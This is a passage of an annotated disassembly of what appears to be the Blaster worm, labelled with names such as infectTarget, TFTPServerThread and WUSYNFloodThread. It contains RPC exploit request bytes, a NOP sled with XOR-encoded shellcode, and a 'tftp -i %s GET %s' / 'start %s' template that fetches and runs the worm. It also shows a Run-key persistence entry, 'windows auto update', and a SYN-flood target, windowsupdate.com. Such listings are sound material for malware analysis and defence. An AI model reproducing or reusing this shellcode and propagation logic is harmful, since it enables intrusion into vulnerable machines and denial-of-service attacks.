0, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 496 .data:00404108 db 48h, 0, 0, 0, 7, 0, 66h, 0, 6, 9, 2, 0, 0, 0, 0, 0; 512 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 10h, 0, 0, 0, 0, 0, 0, 0; 528 .data:00404108 db 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 78h, 19h, 0Ch, 0; 544 .data:00404108 db 58h, 0, 0, 0, 5, 0, 6, 0, 1, 0, 0, 0, 70h,0D8h, 98h, 93h; 560 .data:00404108 db 98h, 4Fh,0D2h, 11h,0A9h, 3Dh,0BEh, 57h,0B2h, 0, 0, 0, 32h, 0, 31h, 0; 576 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 80h, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh; 592 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 608 .data:00404108 db 18h, 43h, 14h, 0, 0, 0, 0, 0, 60h, 0, 0, 0, 60h, 0, 0, 0; 624 .data:00404108 db 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0,0C0h, 1, 0, 0, 0, 0, 0, 0; 640 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 3Bh, 3, 0, 0, 0, 0, 0, 0; 656 .data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 0, 0, 0, 0, 30h, 0, 0, 0; 672 .data:00404108 db 1, 0, 1, 0, 81h,0C5h, 17h, 3, 80h, 0Eh,0E9h, 4Ah, 99h, 99h,0F1h, 8Ah; 688 .data:00404108 db 50h, 6Fh, 7Ah, 85h, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 704 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0; 720 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 30h, 0, 0, 0, 78h, 0, 6Eh, 0; 736 .data:00404108 db 0, 0, 0, 0,0D8h,0DAh, 0Dh, 0, 0, 0, 0, 0, 0, 0, 0, 0; 752 .data:00404108 db 20h, 2Fh, 0Ch, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0; 768 .data:00404108 db 0, 0, 0, 0, 3, 0, 0, 0, 46h, 0, 58h, 0, 0, 0, 0, 0; 784 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 10h, 0, 0, 0, 30h, 0, 2Eh, 0; 800 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 816 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 68h, 0, 0, 0, 0Eh, 0,0FFh,0FFh; 832 .data:00404108 db 68h, 8Bh, 0Bh, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 848 .data:00404468 request2 db 20h, 0, 0, 0, 0, 0, 0, 0, 20h, 0, 0, 0, 5Ch, 0, 5Ch, 0; 0 .data:00404478 request3: .data:00404478 unicode 0, <\C$\123456111111111111111.doc>,0 .data:004044B4 sc: .data:004044B4 unicode 0, .data:004044D8 dd 0FFFFFFFFh .data:004044DC dd 7FFDE0CCh .data:004044E0 dd 7FFDE0CCh .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 0 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 16 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 32 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 48 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 64 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 80 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 96 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 112 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 128 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 144 .data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h,0EBh, 19h, 5Eh, 31h,0C9h, 81h,0E9h, 89h,0FFh; 160 .data:004044E4 db 0FFh,0FFh, 81h, 36h, 80h,0BFh, 32h, 94h, 81h,0EEh,0FCh,0FFh,0FFh,0FFh,0E2h,0F2h; 176 .data:004044E4 db 0EBh, 5,0E8h,0E2h,0FFh,0FFh,0FFh, 3, 53h, 6, 1Fh, 74h, 57h, 75h, 95h, 80h; 192 .data:004044E4 db 0BFh,0BBh, 92h, 7Fh, 89h, 5Ah, 1Ah,0CEh,0B1h,0DEh, 7Ch,0E1h,0BEh, 32h, 94h, 9; 208 .data:004044E4 db 0F9h, 3Ah, 6Bh,0B6h,0D7h, 9Fh, 4Dh, 85h, 71h,0DAh,0C6h, 81h,0BFh, 32h, 1Dh,0C6h; 224 .data:004044E4 db 0B3h, 5Ah,0F8h,0ECh,0BFh, 32h,0FCh,0B3h, 8Dh, 1Ch,0F0h,0E8h,0C8h, 41h,0A6h,0DFh; 240 .data:004044E4 db 0EBh,0CDh,0C2h, 88h, 36h, 74h, 90h, 7Fh, 89h, 5Ah,0E6h, 7Eh, 0Ch, 24h, 7Ch,0ADh; 256 .data:004044E4 db 0BEh, 32h, 94h, 9,0F9h, 22h, 6Bh,0B6h,0D7h, 4Ch, 4Ch, 62h,0CCh,0DAh, 8Ah, 81h; 272 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0ABh,0CDh,0E2h, 84h,0D7h,0F9h, 79h, 7Ch, 84h,0DAh, 9Ah, 81h; 288 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A7h,0CDh,0E2h, 84h,0D7h,0EBh, 9Dh, 75h, 12h,0DAh, 6Ah, 80h; 304 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A3h,0CDh,0E2h, 84h,0D7h, 96h, 8Eh,0F0h, 78h,0DAh, 7Ah, 80h; 320 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Fh,0CDh,0E2h, 84h,0D7h, 96h, 39h,0AEh, 56h,0DAh, 4Ah, 80h; 336 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Bh,0CDh,0E2h, 84h,0D7h,0D7h,0DDh, 6,0F6h,0DAh, 5Ah, 80h; 352 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 97h,0CDh,0E2h, 84h,0D7h,0D5h,0EDh, 46h,0C6h,0DAh, 2Ah, 80h; 368 .data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 93h, 1, 6Bh, 1, 53h,0A2h, 95h, 80h,0BFh, 66h,0FCh, 81h; 384 .data:004044E4 db 0BEh, 32h, 94h, 7Fh,0E9h, 2Ah,0C4h,0D0h,0EFh, 62h,0D4h,0D0h,0FFh, 62h, 6Bh,0D6h; 400 .data:004044E4 db 0A3h,0B9h, 4Ch,0D7h,0E8h, 5Ah, 96h, 80h,0AEh, 6Eh, 1Fh, 4Ch,0D5h, 24h,0C5h,0D3h; 416 .data:004044E4 db 40h, 64h,0B4h,0D7h,0ECh,0CDh,0C2h,0A4h,0E8h, 63h,0C7h, 7Fh,0E9h, 1Ah, 1Fh, 50h; 432 .data:004044E4 db 0D7h, 57h,0ECh,0E5h,0BFh, 5Ah,0F7h,0EDh,0DBh, 1Ch, 1Dh,0E6h, 8Fh,0B1h, 78h,0D4h; 448 .data:004044E4 db 32h, 0Eh,0B0h,0B3h, 7Fh, 1, 5Dh, 3, 7Eh, 27h, 3Fh, 62h, 42h,0F4h,0D0h,0A4h; 464 .data:004044E4 db 0AFh, 76h, 6Ah,0C4h, 9Bh, 0Fh, 1Dh,0D4h, 9Bh, 7Ah, 1Dh,0D4h, 9Bh, 7Eh, 1Dh,0D4h; 480 .data:004044E4 db 9Bh, 62h, 19h,0C4h, 9Bh, 22h,0C0h,0D0h,0EEh, 63h,0C5h,0EAh,0BEh, 63h,0C5h, 7Fh; 496 .data:004044E4 db 0C9h, 2,0C5h, 7Fh,0E9h, 22h, 1Fh, 4Ch,0D5h,0CDh, 6Bh,0B1h, 40h, 64h, 98h, 0Bh; 512 .data:004044E4 db 77h, 65h, 6Bh,0D6h, 93h,0CDh,0C2h, 94h,0EAh, 64h,0F0h, 21h, 8Fh, 32h, 94h, 80h; 528 .data:004044E4 db 3Ah,0F2h,0ECh, 8Ch, 34h, 72h, 98h, 0Bh,0CFh, 2Eh, 39h, 0Bh,0D7h, 3Ah, 7Fh, 89h; 544 .data:004044E4 db 34h, 72h,0A0h, 0Bh, 17h, 8Ah, 94h, 80h,0BFh,0B9h, 51h,0DEh,0E2h,0F0h, 90h, 80h; 560 .data:004044E4 db 0ECh, 67h,0C2h,0D7h, 34h, 5Eh,0B0h, 98h, 34h, 77h,0A8h, 0Bh,0EBh, 37h,0ECh, 83h; 576 .data:004044E4 db 6Ah,0B9h,0DEh, 98h, 34h, 68h,0B4h, 83h, 62h,0D1h,0A6h,0C9h, 34h, 6, 1Fh, 83h; 592 .data:004044E4 db 4Ah, 1, 6Bh, 7Ch, 8Ch,0F2h, 38h,0BAh, 7Bh, 46h, 93h, 41h, 70h, 3Fh, 97h, 78h; 608 .data:004044E4 db 54h,0C0h,0AFh,0FCh, 9Bh, 26h,0E1h, 61h, 34h, 68h,0B0h, 83h, 62h, 54h, 1Fh, 8Ch; 624 .data:004044E4 db 0F4h,0B9h,0CEh, 9Ch,0BCh,0EFh, 1Fh, 84h, 34h, 31h, 51h, 6Bh,0BDh, 1, 54h, 0Bh; 640 .data:004044E4 db 6Ah, 6Dh,0CAh,0DDh,0E4h,0F0h, 90h, 80h, 2Fh,0A2h, 4, 0; 656 .data:00404780 request4 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 20h, 0, 0, 0, 30h, 0, 2Dh, 0; 0 .data:00404780 db 0, 0, 0, 0, 88h, 2Ah, 0Ch, 0, 2, 0, 0, 0, 1, 0, 0, 0; 16 .data:00404780 db 28h, 8Ch, 0Ch, 0, 1, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0; 32 .data:004047B0 g_zerobuf60 db 3Ch dup(0) .data:004047EC aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: WUSYNFloodThread+E^o .data:004047FE aS_0 db '%s',0Ah,0 ; DATA XREF: infectTarget+47F^o .data:00404802 aStartS db 'start %s',0Ah,0 ; DATA XREF: infectTarget+432^o .data:0040480C aTftpISGetS db 'tftp -i %s GET %s',0Ah,0 ; DATA XREF: infectTarget+3C4^o .data:0040481F aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: infectTarget+36E^o .data:0040482B aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: infect20Hosts+8C^o .data:0040482B ; sendTCP80SYN+66^o .data:00404837 aRb db 'rb',0 ; DATA XREF: TFTPServerThread+BA^o .data:0040483A aM db 'M',0 ; DATA XREF: WinMain+2CB^o .data:0040483C aD db 'd',0 ; DATA XREF: WinMain+2B2^o .data:0040483E a_ db '.',0 ; DATA XREF: WinMain+18C^o .data:0040483E ; WinMain+1AE^o ... .data:00404840 aS db '%s',0 ; DATA XREF: WinMain+17B^o .data:00404843 aBilly db 'BILLY',0 ; DATA XREF: WinMain+4F^o .data:00404849 aWindowsAutoUpd db 'windows auto update',0 ; DATA XREF: WinMain+3A^o .data:0040485D aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 .data:0040485D ; DATA XREF: WinMain+20^o .data:0040488B align 4 .data:0040488B _data ends .data:0040488B .idata:004051C8 ; .idata:004051C8 ; Imports from WS2_32.DLL .idata:004051C8 ; .idata:004051C8 ; Section 4. (virtual address 00005000) .idata:004051C8 ; Virtual size : 000006C0 ( 1728.) .idata:004051C8 ; Section size in file : 000006C0 ( 1728.) .idata:004051C8 ; Offset to raw data for section: 00002400 .idata:004051C8 ; Flags C0000060: Text Data Readable Writable .idata:004051C8 ; Alignment : 16 bytes ? .idata:004051C8 ; --------------------------------------------------------------------------- .idata:004051C8 .idata:004051C8 ; Segment type: Externs .idata:004051C8 ; _idata .idata:004051C8 ; u_short __stdcall __imp_htons(u_short hostshort) .idata:004051C8 extrn __imp_htons:dword ; DATA XREF: htons^r .idata:004051CC ; int __stdcall __imp_ioctlsocket(SOCKET s,__int32 cmd,u_long *argp) .idata:004051CC extrn __imp_ioctlsocket:dword ; DATA XREF: ioctlsocket^r .idata:004051D0 ; unsigned __int32 __stdcall __imp_inet_addr(const char *cp) .idata:004051D0 extrn __imp_inet_addr:dword ; DATA XREF: inet_addr^r .idata:004051D4 ; char *__stdcall __imp_inet_ntoa(struct in_addr in) .idata:004051D4 extrn __imp_inet_ntoa:dword ; DATA XREF: inet_ntoa^r .idata:004051D8 ; int __stdcall __imp_recvfrom(SOCKET s,char *buf,int len,int flags,struct sockaddr *from,int *fromlen) .idata:004051D8 extrn __imp_recvfrom:dword ; DATA XREF: recvfrom^r .idata:004051DC ; int __stdcall __imp_select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout) .idata:004051DC extrn __imp_select:dword ; DATA XREF: select^r .idata:004051E0 ; int __stdcall __imp_send(SOCKET s,const char *buf,int len,int flags) .idata:004051E0 extrn __imp_send:dword ; DATA XREF: send^r .idata:004051E4 ; int __stdcall __imp_sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen) .idata:004051E4 extrn __imp_sendto:dword ; DATA XREF: sendto^r .idata:004051E8 ; int __stdcall __imp_setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen) .idata:004051E8 extrn __imp_setsockopt:dword ; DATA XREF: setsockopt^r .idata:004051EC ; SOCKET __stdcall __imp_socket(int af,int type,int protocol) .idata:004051EC extrn __imp_socket:dword ; DATA XREF: socket^r .idata:004051F0 ; struct hostent *__stdcall __imp_gethostbyname(const char *name) .idata:004051F0 extrn __imp_gethostbyname:dword ; DATA XREF: gethostbyname^r .idata:004051F4 ; int __stdcall __imp_bind(SOCKET s,const struct sockaddr *name,int namelen) .idata:004051F4 extrn __imp_bind:dword ; DATA XREF: bind^r .idata:004051F8 ; int __stdcall __imp_gethostname(char *name,int namelen) .idata:004051F8 extrn __imp_gethostname:dword ; DATA XREF: gethostname^r .idata:004051FC ; int __stdcall __imp_closesocket(SOCKET s) .idata:004051FC extrn __imp_closesocket:dword ; DATA XREF: closesocket^r .idata:00405200 ; int __stdcall __imp_WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData) .idata:00405200 extrn __imp_WSAStartup:dword ; DATA XREF: WSAStartup^r .idata:00405204 ; int _imp_WSACleanup(void) .idata:00405204 extrn __imp_WSACleanup:dword ; DATA XREF: WSACleanup^r .idata:00405208 ; int __stdcall __imp_connect(SOCKET s,const struct sockaddr *name,int namelen) .idata:00405208 extrn __imp_connect:dword ; DATA XREF: connect^r .idata:0040520C ; int __stdcall __imp_getpeername(SOCKET s,struct sockaddr *name,int *namelen) .idata:0040520C extrn __imp_getpeername:dword ; DATA XREF: getpeername^r .idata:00405210 ; int __stdcall __imp_getsockname(SOCKET s,struct sockaddr *name,int *namelen) .idata:00405210 extrn __imp_getsockname:dword ; DATA XREF: getsockname^r .idata:00405214 ; SOCKET __stdcall __imp_WSASocketA(int af,int type,int protocol,LPWSAPROTOCOL_INFOA lpProtocolInfo,GROUP g,DWORD dwFlags) .idata:00405214 extrn __imp_WSASocketA:dword ; DATA XREF: WSASocketA^r .idata:00405218 .idata:0040521C .idata:00405220 ; .idata:00405220 ; Imports from WININET.DLL .idata:00405220 ; .idata:00405220 extrn __imp_InternetGetConnectedState:dword .idata:00405220 ; DATA XREF: InternetGetConnectedState^r .idata:00405224 .idata:00405228 .idata:0040522C ; .idata:0040522C ; Imports from KERNEL32.DLL .idata:0040522C ; .idata:0040522C ; void __stdcall __imp_ExitProcess(UINT uExitCode) .idata:0040522C extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess^r .idata:00405230 ; void __stdcall __imp_ExitThread(DWORD dwExitCode) .idata:00405230 extrn __imp_ExitThread:dword ; DATA XREF: ExitThread^r .idata:00405234 ; LPSTR _imp_GetCommandLineA(void) .idata:00405234 extrn __imp_GetCommandLineA:dword .idata:00405234 ; DATA XREF: GetCommandLineA^r .idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate) .idata:00405238 extrn __imp_GetDateFormatA:dword .idata:00405238 ; DATA XREF: GetDateFormatA^r .idata:0040523C ; DWORD _imp_GetLastError(void) .idata:0040523C extrn __imp_GetLastError:dword ; DATA XREF: GetLastError^r .idata:00405240 ; DWORD __stdcall __imp_GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize) .idata:00405240 extrn __imp_GetModuleFileNameA:dword .idata:00405240 ; DATA XREF: GetModuleFileNameA^r .idata:00405244 ; HMODULE __stdcall __imp_GetModuleHandleA(LPCSTR lpModuleName) .idata:00405244 extrn __imp_GetModuleHandleA:dword .idata:00405244 ; DATA XREF: GetModuleHandleA^r .idata:00405248 ; BOOL __stdcall __imp_CloseHandle(HANDLE hObject) .idata:00405248 extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle^r .idata:0040524C ; DWORD _imp_GetTickCount(void) .idata:0040524C extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount^r .idata:00405250 extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind^r .idata:00405254 ; HANDLE __stdcall __imp_CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName) .idata:00405254 extrn __imp_CreateMutexA:dword ; DATA XREF: CreateMutexA^r .idata:00405258 ; void __stdcall __imp_Sleep(DWORD dwMilliseconds) .idata:00405258 extrn __imp_Sleep:dword ; DATA XREF: Sleep^r .idata:0040525C ; BOOL __stdcall __imp_TerminateThread(HANDLE hThread,DWORD dwExitCode) .idata:0040525C extrn __imp_TerminateThread:dword .idata:0040525C ; DATA XREF: TerminateThread^r .idata:00405260 ; HANDLE __stdcall __imp_CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,DWORD dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId) .idata:00405260 extrn __imp_CreateThread:dword ; DATA XREF: CreateThread^r .idata:00405264 .idata:00405268 .idata:0040526C ; .idata:0040526C ; Imports from ADVAPI32.DLL .idata:0040526C ; .idata:0040526C ; LONG __stdcall __imp_RegCloseKey(HKEY hKey) .idata:0040526C extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey^r .idata:00405270 ; LONG __stdcall __imp_RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition) .idata:00405270 extrn __imp_RegCreateKeyExA:dword .idata:00405270 ; DATA XREF: RegCreateKeyExA^r .idata:00405274 ; LONG __stdcall __imp_RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData) .idata:00405274 extrn __imp_RegSetValueExA:dword .idata:00405274 ; DATA XREF: RegSetValueExA^r .idata:00405278 .idata:0040527C .idata:00405280 ; .idata:00405280 ; Imports from CRTDLL.DLL .idata:00405280 ; .idata:00405280 extrn __imp___GetMainArgs:dword ; DATA XREF: __GetMainArgs^r .idata:00405284 ; int __cdecl _imp_atoi(const char *) .idata:00405284 extrn __imp_atoi:dword ; DATA XREF: atoi^r .idata:00405288 ; void __cdecl _imp_exit(int) .idata:00405288 extrn __imp_exit:dword ; DATA XREF: exit^r .idata:0040528C extrn __imp_fclose:dword ; DATA XREF: fclose^r .idata:00405290 extrn __imp_fopen:dword ; DATA XREF: fopen^r .idata:00405294 extrn __imp_fread:dword ; DATA XREF: fread^r .idata:00405298 ; void *__cdecl _imp_memcpy(void *,const void *,size_t) .idata:00405298 extrn __imp_memcpy:dword ; DATA XREF: memcpy^r .idata:0040529C ; void *__cdecl _imp_memset(void *,int,size_t) .idata:0040529C extrn __imp_memset:dword ; DATA XREF: memset^r .idata:004052A0 extrn __imp_raise:dword ; DATA XREF: raise^r .idata:004052A4 ; int _imp_rand(void) .idata:004052A4 extrn __imp_rand:dword ; DATA XREF: rand^r .idata:004052A8 extrn __imp_signal:dword ; DATA XREF: signal^r .idata:004052AC extrn __imp_sprintf:dword ; DATA XREF: sprintf^r .idata:004052B0 ; void __cdecl _imp_srand(unsigned int) .idata:004052B0 extrn __imp_srand:dword ; DATA XREF: srand^r .idata:004052B4 ; char *__cdecl _imp_strchr(const char *,int) .idata:004052B4 extrn __imp_strchr:dword ; DATA XREF: strchr^r .idata:004052B8 ; char *__cdecl _imp_strtok(char *,const char *) .idata:004052B8 extrn __imp_strtok:dword ; DATA XREF: strtok^r .idata:004052BC .idata:004052BC .idata:004052BC .idata:004052BC end start